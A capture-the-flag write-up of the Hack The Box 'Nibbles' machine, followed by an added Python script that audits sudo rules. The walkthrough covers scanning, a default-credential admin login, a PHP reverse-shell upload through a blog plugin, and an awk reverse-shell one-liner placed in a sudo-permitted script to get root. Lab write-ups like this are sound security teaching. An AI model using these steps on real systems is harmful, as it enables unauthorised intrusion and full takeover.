HacktheBox: Nibbles

My first step was to run Nmap against the machine to identify running services.

# Nmap 7.80 scan initiated Mon Nov  2 13:11:02 2020 as: nmap -p- -sV -sC -O -oN scan
Nmap scan report for
Host is up (0.022s latency).
Not shown: 65533 closed ports
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Nov  2 13:12:43 2020 -- 1 IP address (1 host up) scanned in 100.56 seconds

As you can see, both SSH (22) and HTTP (80) were open. I decided to browse to port 80 first, where I was greeted with a page containing only the text “Hello World!”. Viewing the page source showed a hidden comment:

<b>Hello world!</b>

<!-- /nibbleblog/ directory. Nothing interesting here! -->

I browsed to the nibbleblog directory and was greeted with the following:

I then ran DIRB against the webserver to find hidden directories.

kali@kali:~$ dirb /usr/share/wordlists/dirb/big.txt 

DIRB v2.22    
By The Dark Raver

START_TIME: Mon Nov  2 13:17:36 2020
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt


GENERATED WORDS: 20458                                                         

---- Scanning URL: ----
+ (CODE:200|SIZE:4628)                                                                                                                                                                               
==> DIRECTORY:                                                                                                                                                                                       
==> DIRECTORY:                                                                                                                                                                                     
==> DIRECTORY:                                                                                                                                                                                   
==> DIRECTORY:                                                                                                                                                                                     
==> DIRECTORY:                                                                                                                                                                                      
---- Entering directory: ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
---- Entering directory: ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
---- Entering directory: ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
---- Entering directory: ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
---- Entering directory: ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
END_TIME: Mon Nov  2 13:24:51 2020

From the output you can see that multiple directories were found, some of them with directory listing enabled. The one of interest was the admin directory; browsing to it displayed an admin login page. From here I was able to log in using common credentials found via Google (admin:nibbles).

I then found the following website, which describes the process of uploading a reverse shell via the image upload plugin. So I modified Kali's default PHP reverse shell from /usr/share/webshells/php/php-reverse-shell.php with my VPN tunnel IP address and port 2600. I then browsed to Plugins, then to the “My Image” plugin configuration page, and uploaded the shell using the form on that page.


The shell then uploads to

I started a netcat listener on port 2600 and browsed to that page to execute the reverse shell.

root@kali:/home/kali/Documents/nibbles# nc -nvlp 2600
listening on [any] 2600 ...
connect to [] from (UNKNOWN) [] 56942
Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 14:43:24 up 6 min,  0 users,  load average: 0.00, 0.02, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
/bin/sh: 0: can't access tty; job control turned off
$ cd home
$ ls
$ cd nibbler
$ ls
$ cat user.txt

As you can see from the output, the reverse shell worked and I was able to capture the user flag.

The next step was to escalate privileges to root. This ended up being very simple. I ran sudo -l to see which commands nibbler could run under sudo:

sudo -l
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

You can see from the output that /home/nibbler/personal/stuff/monitor.sh can be run as root with sudo and without a password. Because the path sits inside nibbler's home directory, the nibbler user can create the file with arbitrary contents. I created the /home/nibbler/personal/stuff/ directory and then a monitor.sh file with the following contents:

#! /bin/bash
awk 'BEGIN {s = "/inet/tcp/0/"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

This creates a reverse shell to my Kali machine on port 2667. I started a netcat listener on that port and then ran monitor.sh under sudo:

cd /home/nibbler/personal/stuff
sudo ./monitor.sh
root@kali:/home/kali/Documents/nibbles# nc -nvlp 2667
listening on [any] 2667 ...

connect to [] from (UNKNOWN) [] 39924
shell>cat /root/root.txt

As you can see in the output, the reverse shell connected back and I was able to capture the root flag.
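The root path on this box is a sudoers rule whose NOPASSWD target lives under the invoking user's own home directory. As an added example (not part of the original write-up), the audit below parses sudo -l output and flags any rule whose target, or whose nearest existing ancestor directory, the user can write to; the systemctl rule and the simulated filesystem are constructed for contrast.

```python
"""Audit `sudo -l` output for targets the invoking user can create or replace."""
import os
import re

# Constructed sample: the monitor.sh rule from the write-up plus a correctly
# scoped counterpart; the simulated filesystem is what nibbler would see.
SAMPLE_SUDO_L = r"""
User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
    (root) NOPASSWD: /usr/bin/systemctl status apache2
"""
SIM_EXISTS = {"/", "/home", "/home/nibbler", "/usr", "/usr/bin", "/usr/bin/systemctl"}
SIM_WRITABLE = {"/home/nibbler"}  # personal/stuff does not exist yet

RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

def parse_sudo_l(output):
    """One dict per command in the '(runas) TAGS: cmd, cmd' lines of `sudo -l`."""
    rules = []
    for line in output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        for cmd in m.group("cmds").split(","):
            if cmd.split():
                rules.append({"runas": m.group("runas"), "nopasswd": "NOPASSWD" in tags, "path": cmd.split()[0]})
    return rules

def ancestors(path):
    # Yield path, its parent, and so on up to the filesystem root.
    while True:
        yield path
        parent = os.path.dirname(path)
        if parent == path:
            return
        path = parent

def risky_rules(rules, exists=os.path.exists, writable=lambda p: os.access(p, os.W_OK)):
    """Flag rules whose target, or any existing ancestor, is writable: a missing
    target can be created, an existing one renamed away and replaced."""
    flagged = []
    for rule in rules:
        start = next((p for p in ancestors(rule["path"]) if exists(p)), None)
        if start is not None and any(writable(p) for p in ancestors(start)):
            flagged.append(rule)
    return flagged

def audit(output=SAMPLE_SUDO_L, exists=SIM_EXISTS.__contains__, writable=SIM_WRITABLE.__contains__):
    """Paths of sudo targets the invoking user could tamper with."""
    return [r["path"] for r in risky_rules(parse_sudo_l(output), exists, writable)]
```

Run against real `sudo -l` output with the default `exists`/`writable` arguments to check a live host; any flagged path should be moved to a root-owned location such as /usr/local/sbin or the rule removed.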
